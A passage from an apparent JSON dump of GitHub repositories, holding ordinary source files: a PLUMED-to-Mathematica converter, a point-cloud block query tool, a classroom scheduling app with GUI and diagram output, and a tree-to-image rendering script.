{}'.format(file))\n with open(file, 'r') as crf:\n l_data = []\n for line in crf:\n if line.startswith('#'):\n continue\n try:\n if is_number(line.split()[0]):\n l_data += [', '.join(line.split()[0:(num_of_cvs+1)])]\n except IndexError:\n # Blank lines in files have length 0\n continue\n f_data += ['},\\n{'.join(l_data)]\n all_data += f_data\n formatted_data = '{{{' + '}},\\n{{'.join(all_data) + '}}}\\n\\n'\n with open(args.temp_file, 'w') as tf:\n tf.write(formatted_data)\n print('Done reading PLUMED output data')\n\n\ndef data_into_mfile():\n \"\"\"This function takes no arguments and returns nothing.\n It will take data saved to a temporary file from read_plumed_stuff\n and put it into the template .m file so that it can be read into\n Mathematica\"\"\"\n print('Putting data into output file...')\n about_content = []\n about_content += ['\"Number of CVs: {}\"'.format(num_of_cvs)]\n about_content += ['\"Number of points per time chunk: '\n '{}\"'.format(args.stride)]\n about_content += ['\"Originally processed on {}\"'.format(datetime.now())]\n about_content += ['\"Processed with '\n '{} v{}\"'.format(os.path.basename(__file__),\n __version__)]\n about = '{' + ', '.join(about_content) + '}'\n replacements = dict(varname=args.var_name, data=formatted_data,\n numcvs=num_of_cvs, stride=args.stride,\n about=about)\n # Below shouldn't be needed, but leaving for backward compatibility.\n replacements['spacing'] = '(Print[\"getGridSize not currently ' \\\n 'defined\"]; $Failed)'\n print(replacements.keys())\n with open(args.template, 'r') as template, \\\n open(args.output_name, 'w') as output:\n for line in template:\n if line.startswith('#'):\n # Remove the '#'\n line = line[1:]\n try:\n # Unpack the dict, then do the replacements\n output.write(line.format(**replacements))\n except KeyError as e:\n print('Error! Key {} not found!'.format(e))\n choice = input('(a)bort or (s)kip? ')\n if choice in ('a', 'abort'):\n raise e\n elif choice in ('s', 'skip'):\n continue\n else:\n output.write(line)\n print('Output saved as {}'.format(args.output_name))\n\n\ndef clean_up():\n \"\"\"This function takes no arguments and returns nothing.\n It will ask if the temp data should be deleted, and if so, will clean\n it all up. It can also move the output file back to the original\n directory.\n Default is to move the output file to the starting directory, remove\n the HILLS file if copied, and remove the temp data file. Use -c\n argument to change this behavior.\n \"\"\"\n print('Cleaning up...')\n if args.clean > 0:\n if args.verbose:\n print('Copying {} to {}...'.format(args.output_name, current_dir))\n shutil.copy(args.output_name, current_dir)\n if not args.exists:\n # If HILLS file was copied (only true if args.exists is false)\n # delete the copy\n if args.verbose:\n print('Removing {}...'.format(args.hills))\n os.remove(args.hills)\n if args.clean > 1:\n if args.verbose:\n print('Removing {}...'.format(args.temp_file))\n os.remove(args.temp_file)\n if args.clean > 2:\n temp_folder = current_dir + '/' + args.folder\n if args.verbose:\n print('Removing {} and contents...'.format(temp_folder))\n shutil.rmtree(temp_folder)\n print('Done cleaning up files/folders.')\n\n\ncurrent_dir = os.getcwd()\nif not args.exists:\n setup_folder()\n run_plumed_sum_hills()\nread_plumed_stuff()\ndata_into_mfile()\nclean_up()\nprint('Done!')\n"
}
] | 11 |
genmao/pcdquery | https://github.com/genmao/pcdquery | 40b5269df6d6dc70b1fa9e1c58837224f183d9d7 | ef1b4bc1b8624693370f18caaada0cb28dafff81 | ac893c62ba16eae101f40abeebf4f5effa42443b | refs/heads/master | 2021-01-20T03:15:03.579796 | 2017-04-26T19:14:55 | 2017-04-26T19:14:55 | 89,517,006 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4793926179409027,
"alphanum_fraction": 0.5206073522567749,
"avg_line_length": 22.049999237060547,
"blob_id": "da5130ef7a579edda54bc2b4368704570b2160d0",
"content_id": "9f55de7b050beabfbb4963e939636cad437e1865",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 461,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 20,
"path": "/query_allin.cpp",
"repo_name": "genmao/pcdquery",
"src_encoding": "UTF-8",
"text": "#include \"findPCD_allin.h\"\n#include <vector>\n\n/* This is a test. */\n\nint main(){\n double lon = -117.1279;\n double lat = 32.7729;\n std::vector<double> result;\n result = pcd_finder(lon, lat, 1);\n if (result.empty()){\n std::cout << result.size() << std::endl;\n return 0;\n }\n for(int i =0; i < 10; i++){\n std::cout << std::endl << result[i] << std::endl;\n }\n std::cout << result.size() << std::endl;\n return 0;\n}\n"
},
{
"alpha_fraction": 0.7305936217308044,
"alphanum_fraction": 0.7579908967018127,
"avg_line_length": 47.55555725097656,
"blob_id": "a0d41ef85e3b0fd0ebd8425ce9d818b2915264ec",
"content_id": "6fab6eb48f433df91017d493744c7dac7798ebf0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 9,
"path": "/README.md",
"repo_name": "genmao/pcdquery",
"src_encoding": "UTF-8",
"text": "# pcdquery\n\nThe function pcd_finding is in findPCD_allin.h. \n\nInclude findPCD_allin.h, then call std::vector<double> pcd_finder(double lon, double lat, int query_size). \n\nInput is longitude, latitude, the radius of searching field in terms of num of blocks(1 indicates only 1 block, 2 indicates nearby 9 blocks, 3 indicates nearby 25 blocks, etc.). Each block is of 20*20 m^2. \n\nfindPCD_allin.cpp is a demo to call pcd_finding function. \n"
},
{
"alpha_fraction": 0.5476664304733276,
"alphanum_fraction": 0.5834992527961731,
"avg_line_length": 36.66666793823242,
"blob_id": "302f54c04a4ed85fa699b126e3c557d7a5647fb7",
"content_id": "b86aa0d99c543230ffaeefbee68fa6c48bd6897f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4521,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 120,
"path": "/loadPCD_allin.py",
"repo_name": "genmao/pcdquery",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pypcd\nimport datetime\nimport os\nimport math\nfrom struct import Struct\n\n\ndef write_records(records, format, f):\n \"\"\"\n Write a sequence of tuples to a binary file of structures.\n \"\"\"\n record_struct = Struct(format)\n for r in records:\n f.write(record_struct.pack(*r))\n\n'''\ndef pointAssociateToMap(pi, transformTobeMapped):\n x1 = math.cos(transformTobeMapped[2]) * pi[0] - math.sin(transformTobeMapped[2]) * pi[1]\n y1 = math.sin(transformTobeMapped[2]) * pi[0] + math.cos(transformTobeMapped[2]) * pi[1]\n z1 = pi[2]\n\n x2 = x1\n y2 = math.cos(transformTobeMapped[0]) * y1 - math.sin(transformTobeMapped[0]) * z1\n z2 = math.sin(transformTobeMapped[0]) * y1 + math.cos(transformTobeMapped[0]) * z1\n\n t1 = math.cos(transformTobeMapped[1]) * x2 + math.sin(transformTobeMapped[1]) * z2 + transformTobeMapped[3]\n t2 = y2 + transformTobeMapped[4]\n t3 = -math.sin(transformTobeMapped[1]) * x2 + math.cos(transformTobeMapped[1]) * z2 + transformTobeMapped[5]\n t4 = pi[3]\n tmp = [t1, t2, t3, t4]\n return tmp\n'''\n\n\n# load_global_map(f, db, drop) reads pcd data in f (*.pcd) into Mongodb collection db.offlinemap\n# The format is as {\"loc\": [x, z], \"y\": [y]}\n# By default, when drop==False, it would append new data without remove old points.\n# To remove old data in db.offline, please set drop=True\ndef load_global_map(filelist):\n start = datetime.datetime.now()\n point_to_block = {}\n block_size = 20\n count = 0\n for f in filelist:\n count += 1\n print count\n # print \"Reading pcd...\\n\" + f + \"\\n\"\n pc = pypcd.PointCloud.from_path(f)\n global_map = pc.pc_data\n # print datetime.datetime.now() - start\n\n '''\n txtfile = os.path.join(FindPath, f[:-4] + \".txt\")\n mat_list = []\n with open(txtfile) as infile:\n for line in infile:\n fields = line.split()\n mat_list.extend(map(float, fields))\n '''\n # print \"Dumping...\\n\"\n for point in global_map:\n '''\n sin2 = math.sin(mat_list[2])\n cos2 = math.cos(mat_list[2])\n sin1 = math.sin(mat_list[1])\n cos1 = math.cos(mat_list[1])\n sin0 = math.sin(mat_list[0])\n cos0 = math.cos(mat_list[0])\n x1 = cos2 * point[0] - sin2 * point[1]\n y1 = sin2 * point[0] + cos2 * point[1]\n z1 = point[2]\n\n x2 = x1\n y2 = cos0 * y1 - sin0 * z1\n z2 = sin0 * y1 + cos0 * z1\n\n t0 = cos1 * x2 + sin1 * z2 + mat_list[3]\n t1 = y2 + mat_list[4]\n t2 = -sin1 * x2 + math.cos(mat_list[1]) * z2 + mat_list[5]\n t3 = point[3]\n '''\n x_block = int(np.round(point[0]/block_size))*block_size\n z_block = int(np.round(point[2]/block_size))*block_size\n block_tuple = (x_block, z_block)\n point_to_block.setdefault(block_tuple, []).append((point[0], point[2], point[1], point[3]))\n # point_to_block: block->(x,z,y)\n\n print \"Writing...\\n\"\n destination_folder = \"/mnt/truenas/scratch/genmao/one_map_files/\"\n block_start = 0\n block_index = []\n if not os.path.exists(destination_folder):\n os.makedirs(destination_folder)\n blockfilename = destination_folder + \"map1492801000.06.txt\"\n with open(blockfilename, 'ab') as outfile:\n for cell in point_to_block:\n # flatten = [item for sublist in point_to_block[cell] for item in sublist]\n print block_start\n block_index.append((cell[0], cell[1], block_start, block_start + len(point_to_block[cell])))\n block_start += len(point_to_block[cell])\n write_records(point_to_block[cell], '<dddd', outfile)\n block_indexfile = destination_folder + \"idx1492801000.06.txt\"\n with open(block_indexfile, 'wb') as outfile:\n write_records(block_index, '<dddd', outfile)\n print 
datetime.datetime.now() - start\n\n\nif __name__ == \"__main__\":\n FindPath = \"/mnt/truenas/scratch/yiluo/ToGenmao/1492801000.06/mappoints\"\n FileList = []\n FileNames = os.listdir(FindPath)\n if len(FileNames) > 0:\n for f in FileNames:\n if os.path.splitext(f)[-1] == \".pcd\":\n pcdfile = os.path.join(FindPath, f)\n FileList.append(pcdfile)\n load_global_map(FileList)\n # pcdfile = '/home/genmaoshi/Downloads/data_sample/1486176044.29.pcd'\n # pcdfile = '/home/genmaoshi/Downloads/data_sample/part.pcd'\n\n"
}
] | 3 |
TheLostLight/Simple-Scheduler | https://github.com/TheLostLight/Simple-Scheduler | a0854aed9364c9848ae68cd902fa238f48b0e0a6 | feeea1a37715ccfe62a3ca84a7b972434a35a1fd | cc7a7f35dbb0ab64ef68af8c3e6f84f0dcd7c20a | refs/heads/master | 2023-03-29T23:37:51.236124 | 2021-04-10T03:43:00 | 2021-04-10T03:43:00 | 356,461,942 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6098200678825378,
"alphanum_fraction": 0.6146926283836365,
"avg_line_length": 34.560001373291016,
"blob_id": "14ce0833cd61e654ac1f4d368568ab6ece7eb0f4",
"content_id": "99d4e0509dfba0b1d6ecd2f50afe274ec2276588",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2668,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 75,
"path": "/src/scheduler.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "# Takes a list of classes (tuple of two ints) \n# sorted by starting time (ascending).\n# Then fills up classrooms one by one,\n# iterating over the list and removing \n# classes each time they are assigned a classroom\ndef matt_algorithm(class_list):\n classrooms = list()\n minimum_classrooms = 0\n\n while(class_list):\n\n # Unecessary variable, but makes code easier to read\n # (Probably removed by optimizer)\n minimum_classrooms += 1\n\n # Keeps track of index in list of classrooms\n m = minimum_classrooms-1\n\n # Create a new classroom, append first element in the list to it as a list.\n classrooms.append([class_list[0]])\n\n # Temporary list to keep track of unassigned classes.\n temp_list = list()\n\n # Go through all unassigned classes. If they fit into\n # current classroom, add them. Otherwise, add to temp list\n for i in range(1, len(class_list)):\n \n # Change to '>=' if class start times and end times should overlap\n if class_list[i][0] > classrooms[m][-1][1]:\n classrooms[m].append(class_list[i])\n else:\n temp_list.append(class_list[i])\n\n class_list = temp_list.copy()\n\n # Schedule has been made with minimum number of classrooms.\n return classrooms\n\n#Takes a list of classes (tuple of two ints) and\n# treats it as a stack. Sorted by start times\n# (descending as a list, earliest time first out).\n# Sorts each class into the first available classroom one by one.\n# Returns a list of classrooms with their scheduled classes\ndef greedy_algorithm(class_stack):\n classrooms = list()\n\n # Pop elements from stack one by one and find a classroom\n # in which it has no time conflicts\n while(class_stack):\n current_class = class_stack.pop()\n\n # Index to track the next unchecked classroom\n index = 0\n\n # First check if the classroom exists. If not, make it.\n # If it does check if there is no time conflict.\n # If not, add current_class to the classroom.\n # Otherwise, increment the index.\n while(True):\n if index >= len(classrooms):\n classrooms.append([current_class])\n break\n else:\n # Change to '>=' if class start times and end times should overlap \n if current_class[0] > classrooms[index][-1][1]:\n classrooms[index].append(current_class)\n break\n else:\n index += 1\n #End of inner loop\n #End of outer loop\n\n #Schedule has been created. \n return classrooms\n\n"
},
{
"alpha_fraction": 0.5942028760910034,
"alphanum_fraction": 0.5942028760910034,
"avg_line_length": 16.5,
"blob_id": "74ea8bce810a2c7debfb23b2b9fc7bf2c07375c7",
"content_id": "d2533b11d2cc51e43f194e5738a94f7dfd0e95f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 4,
"path": "/src/main.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "from gui import createGUI\n\nif __name__ == '__main__':\n createGUI()"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6543778777122498,
"avg_line_length": 26.1875,
"blob_id": "ec49d382431cf8994fae1bcf9f7b435ff6a1b729",
"content_id": "1f9879b5fe8a3098be50c09553ccade19806b4e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 434,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 16,
"path": "/src/test.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import scheduler\nfrom filereader import getDataset\n\nclasses = getDataset(\"test.txt\")\n\n#classes.sort()\nclasses.sort(reverse=True)\n\n#classrooms = scheduler.matt_algorithm(classes)\nclassrooms = scheduler.greedy_algorithm(classes.copy())\n\nfor i in range(0, len(classrooms)):\n print(\"Classroom \" + str(i+1) + \":\")\n\n for c in classrooms[i]:\n print(\"Class \" + str(classes.index(c)+1) + \": (\" + str(c[0]) + \"-\" + str(c[1]) + \")\")"
},
{
"alpha_fraction": 0.8062015771865845,
"alphanum_fraction": 0.8062015771865845,
"avg_line_length": 25,
"blob_id": "bd49208151aff3849653a9ea5818d279072cc232",
"content_id": "ee0fc4fa0c8775270465616d9442fbc6c1d82aec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 5,
"path": "/README.md",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "# Simple Scheduler\n\nSchedules a list of classes into the minimum number of classrooms.\n\nCan create diagrams and save them to file"
},
{
"alpha_fraction": 0.6003717184066772,
"alphanum_fraction": 0.6115241646766663,
"avg_line_length": 27.36842155456543,
"blob_id": "646b83cb2141782d7bab0d76490db6d54d41e9f7",
"content_id": "669586e68a500ab361a435f4d171e971a841f510",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 19,
"path": "/src/filereader.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import re\n\n# Take an input file and return a list of tuples of two ints\n# (starting time and ending time).\ndef getDataset(file_name):\n with open(file_name, \"r\") as file:\n \n input_text = file.read()\n values = [int(num) for num in re.findall(\"[0-9]+\", input_text)]\n\n if(len(values) < 2):\n raise Exception(\"Less than two numbers found in file.\\n Incorrect formatting.\")\n \n data_set = list()\n\n for i in range(0, len(values), 2):\n data_set.append((values[i], values[i+1]))\n\n return data_set"
},
{
"alpha_fraction": 0.6432432532310486,
"alphanum_fraction": 0.6443243026733398,
"avg_line_length": 32.04081726074219,
"blob_id": "0e3602b025c42ab5f4a7e6b5bb1e5ce8207c3aee",
"content_id": "8eabb43b55760373f00cc217d3b9fa8d77b21dc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6475,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 196,
"path": "/src/gui.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import tkinter\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport os\n\nfrom filegenerator import createExampleFile\nfrom filegenerator import saveDataToFile\nfrom filereader import getDataset\nimport scheduler\nfrom makeimage import getDiagram\n\ndef showFileDialog(top):\n top.withdraw()\n of = filedialog.askopenfilename(parent=top, initialdir=os.getcwd())\n top.deiconify()\n return of\n\ndef showFileSave(top):\n top.withdraw()\n sf = filedialog.asksaveasfilename(parent=top, initialdir=os.getcwd())\n top.deiconify()\n return sf\n\ndef isNotDigit(text):\n return text.isdigit()\n\ndef showTargetPanel(current_frame, target_frame):\n current_frame.pack_forget()\n target_frame.pack()\n\ndef saveExampleFile(top, nclass, max_n):\n \n if nclass == \"\" or max_n == \"\":\n messagebox.showerror(title=\"User error\", message=\"Please enter a number in the above fields\")\n return\n \n top.withdraw()\n save_filename = filedialog.asksaveasfilename(parent=top, title=\"Save example to txt\", initialdir=os.getcwd(), defaultextension=\".txt\")\n top.deiconify()\n\n if save_filename == '':\n return\n\n try:\n createExampleFile(save_filename, int(nclass), int(max_n))\n except TypeError:\n tkinter.messagebox.showerror(title=\"How did that happen?\", message=\"Type error. Was a non-integer entered in input fields?\")\n except IOError:\n tkinter.messagebox.showerror(title=\"IOError\", message=\"There was an error creating the file.\")\n\ndef saveToText(top, data):\n try:\n top.withdraw()\n file_name = filedialog.asksaveasfilename(parent=top, title=\"Save to text\", initialdir=os.getcwd(), defaultextension=\".txt\")\n top.deiconify()\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error opening selected file.\")\n return False\n\n if file_name == \"\":\n return False\n\n try:\n saveDataToFile(file_name, data)\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error saving results to file...\")\n return False\n except TypeError:\n messagebox.showerror(title=\"TypeError\", message=\"There was an error saving results to file...\")\n return False\n\n return True\n\ndef saveToPNG(top, data):\n try:\n top.withdraw()\n file_name = filedialog.asksaveasfilename(parent=top, title=\"Save to png\", initialdir=os.getcwd(), defaultextension=\".png\")\n top.deiconify()\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error opening selected file.\")\n return False\n\n if file_name == \"\":\n return False\n\n try:\n getDiagram(data, file_name, True)\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error saving results to file...\")\n return False\n\n return True\n\ndef saveToBoth(top, data):\n if not saveToText(top, data):\n return\n saveToPNG(top, data)\n\ndef createOutput(top, main_frame, use_matt_algo):\n try:\n file_name = showFileDialog(top)\n\n if file_name == \"\":\n return\n\n data = getDataset(file_name)\n\n if(use_matt_algo):\n data.sort()\n classrooms = scheduler.matt_algorithm(data)\n else:\n data.sort(reverse=True)\n classrooms = scheduler.greedy_algorithm(data.copy())\n \n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"An error with the input file.\")\n return\n\n # Output frame\n #------------------------------------------------------------------------\n output_frame = tkinter.Frame(top)\n\n outputf_label = tkinter.Label(output_frame, text=\"Results ready!\")\n outputf_label.pack()\n\n mimage_button = tkinter.Button(output_frame, 
text=\"Show diagram\", command=lambda: getDiagram(classrooms, \"\", False))\n mimage_button.pack()\n\n simage_button = tkinter.Button(output_frame, text=\"Save diagram to png file\", command=lambda: saveToPNG(top, classrooms))\n simage_button.pack()\n\n stext_button = tkinter.Button(output_frame, text=\"Save raw data to txt file\", command=lambda: saveToText(top, classrooms))\n stext_button.pack()\n\n both_button = tkinter.Button(output_frame, text=\"Save raw data and diagram\", command=lambda: saveToBoth(top, classrooms))\n both_button.pack()\n\n output_return_button = tkinter.Button(output_frame, text=\"Return\", command=lambda: showTargetPanel(output_frame, main_frame))\n output_return_button.pack()\n\n showTargetPanel(main_frame, output_frame)\n \n\n\ndef createGUI():\n top = tkinter.Tk()\n top.title(\"CPSC-482 Scheduling\")\n\n\n # Main frame\n #------------------------------------------------\n main_frame = tkinter.Frame(top)\n\n generator_button = tkinter.Button(main_frame, text=\"Create new example file\", command=lambda: showTargetPanel(main_frame, example_frame))\n generator_button.pack()\n\n matt_button = tkinter.Button(main_frame, text=\"Use Matt's Algorithm\", command=lambda: createOutput(top, main_frame, True))\n matt_button.pack()\n\n greedy_button = tkinter.Button(main_frame, text=\"Use Greedy Algorithm\", command=lambda: createOutput(top, main_frame, False))\n greedy_button.pack()\n\n exit_button = tkinter.Button(main_frame, text=\"Quit\", command=top.quit)\n exit_button.pack()\n\n main_frame.pack()\n #--------------------------------------------------\n\n # Example frame\n #--------------------------------------------------\n example_frame = tkinter.Frame(top)\n vcmd = example_frame.register(isNotDigit)\n\n nclass_label = tkinter.Label(example_frame, text='Enter # of classes:')\n nclass_label.pack()\n\n class_num = tkinter.Entry(example_frame, validate='key', validatecommand=(vcmd, '%S'))\n #class_num.insert(0, \"1\")\n class_num.pack()\n\n maxn_label = tkinter.Label(example_frame, text=\"Enter maximum timeslot:\")\n maxn_label.pack()\n\n max_time = tkinter.Entry(example_frame, validate='key', validatecommand=(vcmd, '%S'))\n #max_time.insert(0, '2')\n max_time.pack()\n\n ex_save_button = tkinter.Button(example_frame, text='Save to file', command=lambda: saveExampleFile(top, class_num.get(), max_time.get()))\n ex_save_button.pack()\n\n ex_return_button = tkinter.Button(example_frame, text='Return', command=lambda: showTargetPanel(example_frame, main_frame))\n ex_return_button.pack()\n #------------------------------------------------------------------------\n\n \n top.mainloop()"
},
{
"alpha_fraction": 0.5787401795387268,
"alphanum_fraction": 0.6145669221878052,
"avg_line_length": 32,
"blob_id": "5a5ddf3fc05d852a03963eabfce3b98e773e016d",
"content_id": "fe531ff8c19c4cb40230e075b452b074079793d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2540,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 77,
"path": "/src/makeimage.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "from PIL import Image, ImageDraw\n\nHEIGHT_PER_ROOM = 100\nNOTCH_PROTRUSION = 2\nTIME_STEP = 50\nLABEL_FLOAT = 8\nDF = '{0:2g}'\n\ndef drawClass(draw, room, x_origin, tpp, start, stop):\n\n center_y = HEIGHT_PER_ROOM*room + HEIGHT_PER_ROOM/2\n top_left = (x_origin + start/tpp, center_y-20)\n bottom_right = (x_origin + stop/tpp, center_y+20)\n center_x = (top_left[0]+bottom_right[0])/2\n\n draw.rectangle([top_left, bottom_right], fill=\"red\", outline=\"blue\")\n\n label = str(start) + \"-\" + str(stop)\n\n draw.text((center_x-(draw.textlength(label)/2), center_y-25-draw.textsize(label)[1]), label, fill=\"black\")\n\ndef createDiagram(classrooms):\n max_time = 0\n\n #Find maximum class time for scaling purposes\n for c in classrooms:\n max_time = c[-1][1] if c[-1][1] > max_time else max_time\n\n if max_time/0.01 + TIME_STEP + 10 < 2400:\n time_per_pixel = 0.01\n elif max_time/0.1 + TIME_STEP + 10 < 2400:\n time_per_pixel = 0.1\n elif max_time/0.5 + TIME_STEP + 10 < 2400:\n time_per_pixel = 0.5\n else:\n time_per_pixel = 1\n \n\n number_of_rooms = len(classrooms)\n\n result = Image.new('RGBA', (int(max_time/time_per_pixel + TIME_STEP + 10), int(HEIGHT_PER_ROOM*(number_of_rooms+1))), (0, 255, 0, 0))\n draw = ImageDraw.Draw(result)\n\n y_origin = result.size[1] + NOTCH_PROTRUSION - HEIGHT_PER_ROOM\n x_origin = 10\n\n #Draw y_axis\n draw.line([(x_origin, 0), (x_origin, y_origin)], fill=\"black\", width=2)\n #Draw x_axis\n draw.line([(x_origin, y_origin), (result.size[0]-1, y_origin)], fill=\"black\", width=2)\n cursor = x_origin\n label = 0\n while cursor < result.size[0]:\n draw.line([(cursor, y_origin-NOTCH_PROTRUSION), (cursor, y_origin+NOTCH_PROTRUSION+1)], fill=\"grey\", width=2)\n draw.text((cursor-(draw.textlength(DF.format(label))/2)+1, y_origin+LABEL_FLOAT+NOTCH_PROTRUSION), DF.format(label), fill=\"black\")\n label += TIME_STEP*time_per_pixel\n cursor += TIME_STEP\n\n\n #Draw Class labels + class times\n for i in range(0, number_of_rooms):\n text = \"Classroom \" + str(i+1)\n cursor = (result.size[0]-x_origin)/2 - draw.textlength(text)/2 + 1\n draw.text((cursor, HEIGHT_PER_ROOM*i + 1), text, fill=\"black\")\n\n for class_time in classrooms[i]:\n drawClass(draw, i, x_origin, time_per_pixel, class_time[0], class_time[1])\n\n return result\n\ndef getDiagram(data, file_name, save):\n image = createDiagram(data)\n\n if(save):\n image.save(file_name, \"PNG\")\n else:\n image.show()"
},
{
"alpha_fraction": 0.5689783692359924,
"alphanum_fraction": 0.5764355063438416,
"avg_line_length": 32.54999923706055,
"blob_id": "be00f9ab62bd23184ede35811ebfd9ead23a2561",
"content_id": "724e945395d5c508ded0b89c0abf890d0245dc45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1341,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 40,
"path": "/src/filegenerator.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import random\nfrom datetime import datetime\n\n# Randomly generates an example file which can be used as\n# input in fileread.py\n# \n# file_name - Name of resulting output file\n# nclass - Number of individual class times to generate\n# max_time - The maximum latest time a class can end at\ndef createExampleFile(file_name, nclass, max_time):\n result = open(file_name, \"w\")\n\n result.write(\"Classes (start_time::end_time) : \\n\")\n\n for _ in range(0, nclass):\n start = random.randint(0, max_time-1)\n result.write(\"(\" + str(start) + \"::\" + str(random.randint(start+1, max_time)) + \")\\n\")\n\n result.close()\n\n# Saves the result of a scheduling algorithm to a text file\ndef saveDataToFile(file_name, data):\n result = open(file_name, \"w\")\n\n result.write(\"File generated \" + datetime.now().strftime(\"%B %d, %Y - %H:%M:%S\") + \"\\n\\n\")\n result.write(\"Minimum classrooms: \" + str(len(data)) + \"\\n\")\n result.write(\"---------\\n\\n\")\n\n for i in range(0, len(data)):\n result.write(\"Classroom \" + str(i+1) + \":\\n----------------\\n\")\n ind = 1\n\n for class_time in data[i]:\n result.write(\"Class \" + str(ind) + \": (\" + str(class_time[0]) + \"-\" + str(class_time[1]) + \")\\n\")\n ind += 1\n \n #result.write(\"----------------\\n\")\n result.write(\"\\n\")\n\n result.close()"
}
] | 8 |
proto3/SogiTree | https://github.com/proto3/SogiTree | a3303dead9627a82e28c8e84d2f5d7457671c4de | 6026fb8544521023da8dcfa49faa7c651d57c885 | 4b3ff601dbe0e7cbbd1f574a3ec188abacac08e0 | refs/heads/master | 2021-08-22T06:29:59.459744 | 2017-11-29T14:31:41 | 2017-11-29T14:31:41 | 112,467,130 | 0 | 0 | null | 2017-11-29T11:28:20 | 2017-11-26T22:02:11 | 2017-11-29T10:40:40 | null | [
{
"alpha_fraction": 0.43736952543258667,
"alphanum_fraction": 0.46276965737342834,
"avg_line_length": 35.846153259277344,
"blob_id": "0190bb0514a2bbaa4b510c6ec1d62579e94e041d",
"content_id": "0366ae633a54249f5f7a99a4a592b7b811c7fa3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2874,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 78,
"path": "/scripts/tree2ppm.py",
"repo_name": "proto3/SogiTree",
"src_encoding": "UTF-8",
"text": "import sys\nimport random\nfrom PIL import Image, ImageDraw\n#from tkinter import *\n\n\nwith open(sys.argv[1], 'r') as f:\n lines = f.readlines()\n height = len(lines)\n width = len(lines[0]) - 1\n\nprint(width, height)\n\nimg = Image.new('RGBA', (width * 10, height * 10))\nd = {'f': '../textures/f',\n 'F': '../textures/F',\n 't': '../textures/t',\n 'T': '../textures/T',\n 'o': '../textures/o',\n 'r': '../textures/r',\n '-': '../textures/u',\n ' ': '../textures/a'}\n\nx = 0\ny = 0\ndraw = ImageDraw.Draw(img)\n\nworld = []\nfor line in lines:\n current_line = []\n for c in line:\n if c != '\\n':\n current_line.append(c)\n world.append(current_line)\nprint(world)\n\nfor y, line in enumerate(world):\n for x, c in enumerate(line):\n #print(line)\n #for x in range(width):\n #print(x,y)\n green = int((255.0 / height) * y)\n if c == ' ':\n draw.rectangle((x * 10, y * 10, (x+1) * 10, (y+1) * 10), (0,green,255))\n elif c != '\\n':\n ind = random.randint(1,3)\n current_sprite = Image.open(d[line[x]] + str(ind) + '.png')\n img.paste(current_sprite, (x * 10, y * 10))\n\nimg.save('res.png', 'png')\nimg.show()\n'''\n elif c == 'f':\n if x > 0 and y > 0 and x < width - 1 and y < height - 1:\n if (world[x-1][y] == ' ' and world[x][y-1] == ' ' and world[x-1][y-1] == ' '\n and world[x+1][y] == 'f' and world[x][y+1] == 'f'):\n current_sprite_i = Image.open('../textures/f_nwi.png')\n current_sprite = Image.open('../textures/f_nw.png')\n elif (world[x+1][y] == ' ' and world[x][y-1] == ' ' and world[x+1][y-1] == ' '\n and world[x-1][y] == 'f' and world[x][y+1] == 'f'):\n current_sprite_i = Image.open('../textures/f_nei.png')\n current_sprite = Image.open('../textures/f_ne.png')\n elif (world[x+1][y] == ' ' and world[x][y+1] == ' ' and world[x+1][y+1] == ' '\n and world[x-1][y] == 'f' and world[x][y-1] == 'f'):\n current_sprite_i = Image.open('../textures/f_sei.png')\n current_sprite = Image.open('../textures/f_se.png')\n elif (world[x-1][y] == ' ' and world[x-1][y-1] == ' ' and world[x][y-1] == ' '\n and world[x][y-1] == 'f' and world[x+1][y] == 'f'):\n current_sprite_i = 